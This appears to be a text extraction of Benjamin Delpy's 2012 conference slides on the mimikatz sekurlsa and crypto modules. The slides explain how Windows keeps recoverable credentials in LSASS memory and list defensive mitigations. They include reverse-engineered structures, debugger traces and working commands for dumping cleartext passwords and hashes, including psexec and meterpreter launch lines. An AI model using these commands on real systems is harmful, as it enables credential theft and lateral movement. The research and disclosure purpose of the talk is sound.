mimikatz - Blog de Gentil Kiwi

sunflowerplateΤεχνίτη Νοημοσύνη και Ρομποτική

21 Νοε 2013 (πριν από 3 χρόνια και 4 μήνες)

417 εμφανίσεις

mimikatz

Benjamin DELPY `
gentilkiwi
`

focus on
sekurlsa
/pass
-
the
-
pass

and
crypto
patches

Who ? Why ?

Benjamin DELPY `
gentilkiwi
`


French


26y


Kiwi addict


Lazy programmer


Started to code
mimikatz

to :


explain security concepts ;


improve my knowledge ;


prove to Microsoft that sometimes they must change old habits.


Why all in French ?


because I’m



It limits script kiddies
usage


Hack with class

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

2

mimikatz

working

On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8


x86 & x64


2000 support dropped with mimikatz 1.0


Everywhere ; it’s statically compiled


Two modes


direct action (local commands)



process or driver
communication

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

3

sekurlsa.dll

m
i
m
i
k
a
t
z
.
e
x
e

KeyIso

«

Isolation de clé CNG

»

LSASS.EXE

Direct action :

crypto::patchcng

EventLog

«

Journal d’événements Windows

»

SVCHOST.EXE

Direct action :

divers::eventdrop

m
i
m
i
k
a
t
z
.
e
x
e

SamSS

«


Gestionnaire

de
comptes

de
sécurité

»

LSASS.EXE

VirtualAllocEx,
WriteProcessMemory,
CreateRemoteThread...

Open a pipe

Write a welcome message

Wait commands… and return results





mimikatz

architecture of
sekurlsa

&
crypto


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

4

m
i
m
i
k
a
t
z
.
e
x
e

mod_mimikatz_sekurlsa

mod_mimikatz_nogpo

mod_mimikatz_divers

mod_mimikatz_winmine

mod_mimikatz_impersonate

mod_mimikatz_inject

mod_mimikatz_samdump

mod_mimikatz_standard

mod_mimikatz_crypto

mod_mimikatz_handle

mod_mimikatz_system

mod_mimikatz_service

mod_mimikatz_process

mod_mimikatz_thread

mod_mimikatz_terminalserver

mod_mimikatz_privilege

mod_pipe

mod_inject

mod_memory

mod_parseur

mod_patch

mod_hive

mod_secacl

mod_privilege

mod_process

mod_service

mod_system

mod_thread

mod_ts

mod_text

mod_crypto

mod_cryptoapi

mod_cryptoacng

msv_1_0

tspkg

wdigest

livessp

kerberos

kappfree.dll

kelloworld.dll

klock.dll

mimikatz.sys

sekurlsa.dll

sam

secrets

msv_1_0

wdigest

livessp

kerberos

tspkg

mimikatz ::
sekurlsa

what is it ?

A module replacement for my previous favorite library !


A local module that can read data from the
SamSS

Service (well
known LSASS process)


What
sekurlsa

module can dump :


MSV1_0

hashes


TsPkg

passwords


Wdigest

passwords


LiveSSP

passwords


Kerberos

passwords (!)


…?

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

5

mod_mimikatz_sekurlsa

mimikatz ::
sekurlsa

how LSA
works

(
level
)


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

6

LsaSS

WinLogon

Authentication

Packages

msv1_0

tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

Challenge

Response

user:domain:password

PLAYSKOOL

mimikatz ::
sekurlsa

how LSA
works

(
level
)

Authentication packages :


take user’s credentials from the logon


make their own stuff


keep enough
data

in memory to compute responses of
challenges (Single Sign On)


If we can get
data
, and inject it in another session of
LSASS, we avoid authentication part


This is the principle of «

Pass
-
the
-
hash

»


In fact, of «

Pass
-
the
-
x

»

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

7

PLAYSKOOL

mimikatz ::
sekurlsa

history of «

pass
-
the
-
*

»
1/2

Pass
-
the
-
hash


1997
-

Unix modified SAMBA client for Hashes usage ;
Paul Ashton (EIGEN)


2000
-

Private version of a Windows «

LSA Logon Session Editor

» ;
Hernan

Ochoa (
CoreSecurity
)


2007
-

TechEd

@ Microsoft ;
Marc Murray (
TrueSec
)
present
msvctl
, and
provide some downloads of it



2007
-

«

Pass the hash toolkit

» published ;
Hernan

Ochoa (
CoreSecurity
)


2007
-

mimikatz 0.1
includes pass the hash and is publicly available for x86
& x64 versions of Windows (yeah, by
myself

but in French; so not famous ;))


2007 was the year of pass the hash !


Pass
-
the
-
ticket


04/2011
-

wce

(
pass the hash toolkit evolution
) provides Kerberos ticket
support;
Hernan

Ochoa (
Ampliasecurity
)

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

8

mimikatz ::
sekurlsa

history of «

pass
-
the
-
*

»
2/2

Pass
-
the
-
pass


05/2011


mimikatz

1.0 dumps first clear text passwords from
TsPkg

provider (but limited to NT
6 and some XP SP3)


http://blog.gentilkiwi.com/securite/pass
-
the
-
pass


05/2011


return of
mimikatz

; it dumps clear text passwords from
WDigest

provider (unlimited
this time ;))


http://blog.gentilkiwi.com/securite/re
-
pass
-
the
-
pass


05/2011


Some organizations opened cases to Microsoft about it…


…Lots of time…



begin of 2012
-

Lots of blogs (and
Kevin
Mitnick

;)) say few words about mimikatz


03/2012
-

Hernan

Ochoa (
Ampliasecurity
)

publish at
seclists

that
wce

support
WDigest

password
extract…


http://seclists.org/pen
-
test/2012/Mar/7


03/2012


mimikatz

strikes again with
LiveSSP

provider and extracts Live login passwords from
Windows 8 memory


http://blog.gentilkiwi.com/securite/rere
-
pass
-
the
-
pass


03/2012


yeah, once again…, more curious but
Kerberos

keeps passwords in memory


http://blog.gentilkiwi.com/securite/rerere
-
pass
-
the
-
pass


08/2012


sekurlsa

module without injection at all ! (ultra safe)


http://
blog.gentilkiwi.com/securite/mimikatz/sekurlsa
-
fait
-
son
-
apparition

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

9

mimikatz ::
sekurlsa

::
tspkg










because sometimes hash is not enough


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

10

mimikatz ::
sekurlsa

::
tspkg

what is it ?

Microsoft introduces SSO capability for Terminal Server with
NT 6 to improve
RemoteApps

and
RemoteDestkop

users’s

experience


http://technet.microsoft.com/library/cc772108.aspx


Rely on
CredSSP

with Credentials Delegation (!= Account
delegation)


Specs :
http://download.microsoft.com/download/9/5/e/95ef66af
-
9026
-
4bb0
-
a41d
-
a4f81802d92c/%5Bms
-
cssp%5D.pdf


First impression : it
seems

cool



User does not have to type its password


Password is not in RDP file


Password is not in user
secrets

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

11

mimikatz ::
sekurlsa

::
tspkg

questions ?

KB says that for it works, we must enable «

Default credentials

» delegation



Default credentials : The credentials obtained when the user first logs on to
Windows

-

https://msdn.microsoft.com/library/bb204773.aspx


What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …


In all cases, system seems to be vulnerable to pass
-
the
-
*…


In what form ?

Our specs : [MS
-
CSSP]


2.2.1.2.1
TSPasswordCreds



The
TSPasswordCreds

structure contains the user's password credentials that are delegated
to the server. (or PIN)

TSPasswordCreds

::= SEQUENCE {

domainName

[0] OCTET STRING,

userName

[1] OCTET STRING,

password

[2] OCTET STRING

}


Challenge / response for authentication ?


Serveur

:
YES

(TLS / Kerberos)


Client :
NO

; *password* is sent to server…


So password resides somewhere in memory ?

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

12

mimikatz ::
sekurlsa

::
tspkg

symbols & theory

Let’s explore some symbols
!










sounds cool…
(thanks Microsoft)


Let’s imagine a scenario


Enumerate all sessions to obtain
:


Username


Domain


LUID


Call
tspkg!TSCredTableLocateDefaultCreds

(rely on
RtlLookupElementGenericTableAvl
) with
LUID to obtain :


TS_CREDENTIAL


Call
tspkg!TSObtainClearCreds

(rely on
LsaUnprotectMemory
) with
TS_CREDENTIAL

data
(
TS_PRIMARY_CREDENTIAL
) for :


TS_PRIMARY_CREDENTIAL

with clear text credentials


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

13

kd
> x
tspkg
!*clear*

75016d1c
tspkg!TS
ObtainClearCreds

= <no type information>

kd
> x
tspkg
!*password*

75011b68
tspkg!TSDuplicatePassword

= <no type information>

75011cd4
tspkg!TSHidePassword

= <no type information>

750195ee
tspkg!TS
RevealPassword

= <no type information>

75012fbd
tspkg!TSUpdateCredentialsPassword

= <no type information>

kd
> x
tspkg
!*locate*

7501158b
tspkg!TSCredTable
LocateDefaultCred
s

= <no type information>

mimikatz ::
sekurlsa

::
tspkg

workflow


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

14

RtlLookupElementGenericTabl
eAvl

LsaUnprotectMemory

KIWI_TS_CREDEN
TIAL

KIWI_TS_PRIMAR
Y_CREDENTIAL

typedef

struct

_KIWI_TS_PRIMARY_CREDENTIAL {

PVOID unk0;

LSA_UNICODE_STRING
Domaine
;

LSA_UNICODE_STRING
UserName
;

LSA_UNICODE_STRING Password;

} KIWI_TS_PRIMARY_CREDENTIAL,
*PKIWI_TS_PRIMARY_CREDENTIAL;

LsaEnumerateLogonSessions

for each LUID

password
in clear !

tspkg!TSGlobal
CredTable

typedef

struct

_KIWI_TS_CREDENTIAL {

#
ifdef

_M_X64


BYTE unk0[108];

#
elif

defined _M_IX86


BYTE unk0[64];

#
endif


LUID
LocallyUniqueIdentifier
;


PVOID unk1;


PVOID unk2;


PKIWI_TS_PRIMARY_CREDENTIAL
pTsPrimary
;

} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

KIWI_TS_CREDEN
TIAL

mimikatz ::
sekurlsa

::
tspkg

demo time !










sekurlsa
::
tspkg

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

15

mimikatz ::
sekurlsa

::
wdigest










because clear text password over http/https is not cool

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

16

mimikatz ::
sekurlsa

::
wdigest

what is it ?


Digest access authentication

is one of the agreed
-
upon methods a
web server can use to negotiate credentials with a user's web
browser.
It applies a hash function to a password

before sending it
over the network […]”

Wikipedia
:
http://en.wikipedia.org/wiki/Digest_access_authentication


“Common Digest Authentication Scenarios :


Authenticated client access to a Web site


Authenticated client access using SASL


Authenticated client access with integrity protection to a directory service
using LDAP”

Microsoft
:
http://technet.microsoft.com/library/cc778868.aspx


Again, it
seems

cool



No password over the network, just hashes


No reversible password in Active Directory ; hashes for each realm


Only with Advanced Digest
authentication

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

17

mimikatz ::
sekurlsa

::
wdigest

what is it ?

We speak about hashes, but what hashes ?

H = MD5(HA1:nonce:[…]:HA2)


HA1 = MD5(
username:realm:
password
)


HA2 = MD5(
method:digestURI
:[…])


Even after login,
HA1

may change…
realm

is from server side
and cannot be determined before Windows logon


WDigest

provider
must
have elements to compute responses
for different servers :


Username


Realm (from server)


Password

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

18

mimikatz ::
sekurlsa

::
wdigest

theory

This time, we
know

:


that
WDigest

keeps password in memory «

by protocol

» for
HA1

digest


that LSASS love to unprotect password with
LsaUnprotectMemory

(so protect
with
LsaProtectMemory
)


LsaUnprotectMemory


At offset
0xb4

of
LSA_SECPKG_FUNCTION_TABLE


Let’s perform a research in
WDigest

:



Hypothesis seems verified



LsaProtectMemory


At offset
0xb0

of
LSA_SECPKG_FUNCTION_TABLE


Let’s perform a research in
WDigest

:



SpAcceptCredentials

takes clear password in
args


Protect it with
LsaProtectMemory


Update or insert data in double linked list :
wdigest!l_LogSessList

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

19

.text:7409D151 _
DigestCalc
HA1
@8 call
dword

ptr

[eax
+0B4h
]

.text:74096C69 _
SpAcceptCredentials@16 call
dword

ptr

[eax+
0B0h
]

mimikatz ::
sekurlsa

::
wdigest

workflow


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

20

LsaUnprotectMemory

LsaEnumerateLogonSessions

for each LUID

typedef

struct

_KIWI_WDIGEST_LIST_ENTRY {

struct

_KIWI_WDIGEST_LIST_ENTRY *
Flink
;

struct

_KIWI_WDIGEST_LIST_ENTRY *Blink;

DWORD
UsageCount
;

struct

_KIWI_WDIGEST_LIST_ENTRY *This;

LUID
LocallyUniqueIdentifier
;

[…]

LSA_UNICODE_STRING
UserName
;

LSA_UNICODE_STRING
Domaine
;

LSA_UNICODE_STRING Password;

[…]

} KIWI_WDIGEST_LIST_ENTRY,
*PKIWI_WDIGEST_LIST_ENTRY;

wdigest!l_LogS
essList

search linked list for LUID

KIWI_WDIGEST_L
IST_ENTRY

password
in clear !

mimikatz ::
sekurlsa

::
wdigest

demo time !










sekurlsa
::
wdigest

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

21

mimikatz ::
sekurlsa

::
livessp










because Microsoft was too good in closed networks

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

22

mimikatz ::
sekurlsa

::
livessp

how

Actually I’ve only used logical (empirical) approach to
search passwords… :


Protocol reading


Symbols searching


~ Boring

~
… be more brutal this time : make a
WinDBG

trap !

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

23

0:
kd
>
!process 0 0 lsass.exe

PROCESS
83569040

SessionId
: 0 Cid: 0224
Peb
: 7f43f000
ParentCid
: 01b4


DirBase
: 5df58100
ObjectTable
: 80ce4740
HandleCount
: <Data Not Accessible>


Image: lsass.exe


0:
kd
> .process /
i

83569040

You need to continue execution (press 'g' <enter>) for the context

to be switched. When the debugger breaks in again, you will be in

the new process context.

0:
kd
>
g

Break instruction exception
-

code 80000003 (first chance)

nt!RtlpBreakWithStatusInstruction
:

814b39d0 cc
int

3

0:
kd
>
.reload /user

Loading User Symbols

............................................................

0:
kd
>
bp

/p @$
proc

lsasrv!LsaProtectMemory

"
kc

5 ; g"

0:
kd
>
g

mimikatz ::
sekurlsa

::
livessp

how

Let’s login with a Live account on Windows 8 !








After credentials protection,
LsaApLogonUserEx2

calls
LiveCreateLogonSession

to insert data in
LiveGlobalLogonSessionList

(similar to
WDigest
)

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

24

lsasrv!LsaProtectMemory

livessp!LiveMakeSupplementalCred

livessp!LiveMakeSecPkgCredentials

livessp!LsaApLogonUserEx2

livessp!SpiLogonUserEx2


lsasrv!LsaProtectMemory

msv1_0!NlpAddPrimaryCredential

msv1_0!SspAcceptCredentials

msv1_0!SpAcceptCredentials


lsasrv!LsaProtectMemory

tspkg!TSHidePassword

tspkg!SpAcceptCredentials

1:
kd
>
uf

/c livessp!LsaApLogonUserEx2

livessp!LsaApLogonUserEx2 (74781536)

[...]


livessp!LsaApLogonUserEx2+0x560 (74781a96):


call to
livessp!LiveCreateLogonSession

(74784867)

Our
LiveSSP

provider

Yeah, Pass the Hash capability with Live
account too…

Live user can logon through RDP via SSO

mimikatz ::
sekurlsa

::
livessp

workflow


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

25

LsaUnprotectMemory

LsaEnumerateLogonSessions

for each LUID

password
in clear !

typedef struct _KIWI_LIVESSP_LIST_ENTRY {

struct _KIWI_LIVESSP_LIST_ENTRY *Flink;

struct _KIWI_LIVESSP_LIST_ENTRY *Blink;

PVOID

unk0;

PVOID

unk1;

PVOID

unk2;

PVOID

unk3;

DWORD

unk4;

DWORD

unk5;

PVOID

unk6;

LUID

LocallyUniqueIdentifier;

LSA_UNICODE_STRING UserName;

PVOID

unk7;

PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;

} KIWI_LIVESSP_LIST_ENTRY,
*PKIWI_LIVESSP_LIST_ENTRY;

livessp!LiveGloba
lLogonSessionList

search linked list for LUID

KIWI_LIVESSP_LIS
T_ENTRY

KIWI_LIVESSP_PRI
MARY_CREDENTIAL

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {

DWORD isSupp;

DWORD unk0;

LSA_UNICODE_STRING UserName;

LSA_UNICODE_STRING Domaine;

LSA_UNICODE_STRING Password;

} KIWI_LIVESSP_PRIMARY_CREDENTIAL,
*PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

mimikatz ::
sekurlsa





Even if we already have tools for
normal

accounts, are you
not curious to test one with this trap
?*

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

26

* Me, yes

mimikatz ::
sekurlsa

::
kerberos

Let’s login normal account










After credentials protection,
KerbCreateLogonSession

calls :


NT6

;
KerbInsertOrLocateLogonSession

to insert data in
KerbGlobalLogonSessionTable


NT5

;
KerbInsertLogonSession

to insert data in
KerbLogonSessionList

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

27

lsasrv!LsaProtectMemory

kerberos!KerbHideKey

kerberos!KerbCreatePrimaryCredentials

kerberos!KerbCreateLogonSession

kerberos!SpAcceptCredentials


lsasrv!LsaProtectMemory

kerberos!KerbHidePassword

kerberos!KerbCreateLogonSession

kerberos!SpAcceptCredentials


lsasrv!LsaProtectMemory

msv1_0!NlpAddPrimaryCredential

msv1_0!SspAcceptCredentials

msv1_0!SpAcceptCredentials


lsasrv!LsaProtectMemory

wdigest!SpAcceptCredentials


lsasrv!LsaProtectMemory

tspkg!TSHidePassword

tspkg!SpAcceptCredentials

Kerberos part for password ??????

Kerberos, ticket part ? Maybe ;)

mimikatz ::
sekurlsa

::
kerberos

(nt6)

workflow


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

28

RtlLookupElementGenericTabl
eAvl

LsaUnprotectMemory

KIWI_KERBEROS_PR
IMARY_CREDENTIAL

typedef

struct

_KIWI_KERBEROS_PRIMARY_CREDENTIAL

{


DWORD unk0;


PVOID unk1;


PVOID unk2;


PVOID unk3;

#
ifdef

_M_X64


BYTE unk4[32];

#
elif

defined _M_IX86


BYTE unk4[20];

#
endif


LUID
LocallyUniqueIdentifier
;

#
ifdef

_M_X64


BYTE unk5[44];

#
elif

defined _M_IX86


BYTE unk5[36];

#
endif


LSA_UNICODE_STRING
UserName
;


LSA_UNICODE_STRING
Domaine
;


LSA_UNICODE_STRING Password;

} KIWI_KERBEROS_PRIMARY_CREDENTIAL,
*PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

LsaEnumerateLogonSessions

for each LUID

password
in clear !

KIWI_KERBEROS_PR
IMARY_CREDENTIAL

Kerberos!KerbG
lobalLogonSess
ionTable

mimikatz ::
sekurlsa

::
kerberos

(nt5)

workflow


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

29

LsaUnprotectMemory

LsaEnumerateLogonSessions

for each LUID

password
in clear !

typedef struct _KIWI_KERBEROS_LOGON_SESSION {

struct _KIWI_KERBEROS_LOGON_SESSION *Flink;

struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
DWORD

UsageCount;

PVOID

unk0;

PVOID

unk1;

PVOID

unk2;

DWORD

unk3;

DWORD

unk4;

PVOID

unk5;

PVOID

unk6;

PVOID

unk7;

LUID LocallyUniqueIdentifier;

#ifdef _M_IX86

DWORD

unk8;



#endif

DWORD

unk9;

DWORD

unk10;

PVOID

unk11;

DWORD

unk12;

DWORD

unk13;

PVOID

unk14;

PVOID

unk15;

PVOID

unk16;

[…]

LSA_UNICODE_STRING UserName;

LSA_UNICODE_STRING Domaine;

LSA_UNICODE_STRING Password;

} KIWI_KERBEROS_LOGON_SESSION,
*PKIWI_KERBEROS_LOGON_SESSION;

kerberos!KerbLog
onSessionList

search linked list for LUID

KIWI_LIVESSP_PRI
MARY_CREDENTIAL

mimikatz ::
sekurlsa

demo time !










Final
sekurlsa

demo

sekurlsa
::
logonPasswords

full

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

30

mimikatz ::
sekurlsa

::
kerberos


hu

?”

Ok It works…*

But why ?

*
Not
at all logon on
NT5 (can
need an
unlock)


From
my understanding of
Microsoft explanations


no
need of passwords for the Kerberos protocol…


all
is based on the hash (
not very sexy too
)


Microsoft’s
implementation of Kerberos is full of logical…


For
password
auth

:


password hash for shared secret, but
keeping password in memory


For
full smartcard
auth

:


No password on client


No hash on client ?


NTLM hash on client…


KDC sent it back as a
gift

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

31

mimikatz ::
sekurlsa

A
ll passwords in memory are encrypted, but in a reversible way to be used


We used
LsaUnprotecMemory
, in the
LSASS

context, to decrypt them




This function rely on
LsaEncryptMemory

from
lsasrv.dll


For that, we previously inject a DLL (
sekurlsa.dll
) in the
LSASS

process to take
benefits of its keys when we called it


Can it be fun to decrypt outside the process ?


Yes, it is… no more injection, just reading memory of LSASS process…


mimikatz

can use
lsasrv.dll

too and “imports”
LSASS

initialized keys



When we call
LsaEncryptMemory

in
mimikatz
, with all keys imported from
LSASS
, we have
the same comportments than when we are in
LSASS

!

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

32

LsaUnprotectMemory

mimikatz ::
sekurlsa

LsaEncryptMemory

NT5

Depending on the size of the secret,
LsaEncryptMemory

use :


RC4







DES
x

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

33

g_pRandomKey

g_cbRandomKey

@
BYTE[
g_cbRandomKey
]

DWORD ; 256

BYTE[
g_cbRandomKey
]

g_pDESXKey

@
BYTE[
144]

BYTE[
144]

g_Feedback

BYTE[
8]

l
s
a
s
s

l
s
a
s
r
v

l
s
a
s
s

l
s
a
s
r
v

m
i
m
i
k
a
t
z

l
s
a
s
r
v

copy…

mimikatz ::
sekurlsa

LsaEncryptMemory

NT6

Depending on the size of the secret,
LsaEncryptMemory

use :



3DES







AES

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

34

InitializationVector

BYTE[
16]

l
s
a
s
s

l
s
a
s
r
v

l
s
a
s
s

l
s
a
s
r
v

m
i
m
i
k
a
t
z

copy…

h3DesKey

typedef

struct

_KIWI_BCRYPT_KEY_DATA {


DWORD size
;


DWORD tag;


DWORD type;


DWORD unk0;


DWORD unk1;


DWORD unk2;


DWORD unk3;


PVOID unk4;


BYTE data
; /* etc... */

} KIWI_BCRYPT_KEY_DATA,
*PKIWI_BCRYPT_KEY_DATA
;

hAesKey

l
s
a
s
r
v

typedef

struct

_KIWI_BCRYPT_KEY {


DWORD size;


DWORD type;


PVOID unk0;


PKIWI_BCRYPT_KEY_DATA
cle
;


PVOID unk1;

} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

mimikatz ::
sekurlsa

memo

Security Packages







Protection Keys

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

35

Package

Symbols

Type

tspkg

tspkg!
TSGlobalCredTable

RTL_AVL_TABLE

wdigest

wdigest!
l_LogSessList

LIST_ENTRY

livessp

livessp!
LiveGlobalLogonSessionList

LIST_ENTRY

kerberos

(nt5)

kerberos!
KerbLogonSessionList

LIST_ENTRY

kerberos

(nt6)

kerberos!
KerbGlobalLogonSessionTable

RTL_AVL_TABLE

msv1_0

lsasrv
!
LogonSessionList

lsasrv
!
LogonSessionListCount

LIST_ENTRY

ULONG

Key NT

5

Symbols

RC4

lsasrv!
g_cbRandomKey

lsasrv!
g_pRandomKey

DES
x

lsasrv!
g_pDESXKey

lsasrv!
g_Feedback

Key NT

6

Symbols

lsasrv!
InitializationVector

3DES

lsasrv!
h3DesKey

AES

lsasrv!
hAesKey

mimikatz ::
sekurlsa

memo

Some commands :


mimikatz

privilege::debug "
sekurlsa
::
logonPasswords

full" exit


psexec

\
\
windows
-
s
-
c c:
\
mimikatz
\
Win32
\
mimikatz.exe

"
sekurlsa
::
logonPasswords

full" exit


meterpreter

> execute
-
H
-
c
-
i

-
m
-
f /
pentest
/passwords/mimikatz/
mimikatz_x86.exe

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

36

mimikatz 1.0 x64 (RC)


/* Traitement du Kiwi (
Aug


2 2012 01:32:28) */

// http://blog.gentilkiwi.com/mimikatz



mimikatz #
privilege
::
debug

Demande d'ACTIVATION du privilège :
SeDebugPrivilege

: OK



mimikatz #
sekurlsa
::
logonPasswords

full



Authentification Id


: 0;234870

Package d'authentification


: NTLM

Utilisateur principal


: Gentil Kiwi

Domaine d'authentification


: vm
-
w8
-
rp
-
x



msv1_0 :


* Utilisateur


: Gentil Kiwi


* Domaine


: vm
-
w8
-
rp
-
x


* Hash LM


: d0e9aee149655a6075e4540af1f22d3b


* Hash NTLM


: cc36cf7a8514893efccd332446158b1a


kerberos

:


* Utilisateur


: Gentil Kiwi


* Domaine


: vm
-
w8
-
rp
-
x


* Mot de passe : waza1234/


wdigest

:


* Utilisateur


: Gentil Kiwi


* Domaine


: vm
-
w8
-
rp
-
x


* Mot de passe : waza1234/


tspkg

:


* Utilisateur


: Gentil Kiwi


* Domaine


: vm
-
w8
-
rp
-
x


* Mot de passe : waza1234/


livessp

:


n.t. (LUID KO)

mimikatz ::
sekurlsa

what we can do ?

Basics


No physical access to computer (first step to pass the
hash, then pass the pass)


No admin rights / system rights /
debug privileges
(…)


Disable local admin accounts


Strong passwords

(
haha
, it was a
joke ; so useless !!!)


For privileged account, network
login instead of interactive (when possible)


Audit ; pass the
hash

keeps traces and can lock accounts


No admin rights / system rights / debug privileges, even
VIP


Use separated network (or forest) for privileged tasks


More in depth


Force strong authentication (
SmartCard

& Token) : $ /



Short validity for Kerberos tickets


No delegation


Disable NTLM (available with NT6)


No
exotic

:


biometrics (it keeps password somewhere and push it to Windows)


single sign on


Stop shared secrets for authentication : push Public / Private stuff (like keys ;))


Let opportunities to stop
retro compatibility


Disable faulty providers ?


Is it supported by Microsoft ?


Even
if you
can

disable
LiveSSP
,
TsPkg

and
WDigest
, will you disable
Kerberos and msv1_0 ?

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

37

mimikatz ::
crypto

what is it ?

A little module that I wrote to :


play with Windows Cryptographic API / CNG and
RSA keys


automate export of certificates/keys


Even those which are “not” exportable



What
crypto

module can
do
:


List


Providers


Stores


Certificates


Keys


Export


Certificates


public in DER format


with private keys in
PFX

format


Private keys in
PVK

format


it’s cool,
OpenSSL

can deal with it too



Patch


CryptoAPI

in mimikatz context


CNG

in
LSASS

context (again !)

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

38

mod_mimikatz_crypto

mimikatz ::
crypto

how it’s protected

Private keys are DPAPI protected


You cannot reuse private key files on another computer


At least without the master keys and/or password of users


Computer/User can load their own keys because they have enough
secrets to do it (ex : session opened)


Yes, a computer/server open a “session”


Export/Usage can be
limited

by :


Password


Popup


Export/Archive flag no present

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

39

Constraint for most user

Unavailable for computer keys

certutil

-
importpfx

mycert.p12
NoExport

certutil

-
csp

"
Microsoft Enhanced Cryptographic Provider
v1.0
"
-
importpfx

mycert.p12
NoExport

mimikatz ::
crypto ::
capi

how it works

“Microsoft
CryptoAPI provides a secure interface for the cryptographic functionality that is
supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all
cryptographic operations and manage private keys CSPs can be implemented in software
as well as in hardware
.”


http://
technet.microsoft.com/library/cc962093.aspx


Processes (mimikatz, IIS, Active Directory , Internet Explorer,
yourappshere
…) load some
DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, …


cryptdll.dll, rsaenh.dll, …


Process deal with cryptographic keys by this API…

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

40

mimikatz ::
crypto ::
capi

how it’s exported ( level
)


07/11/2012

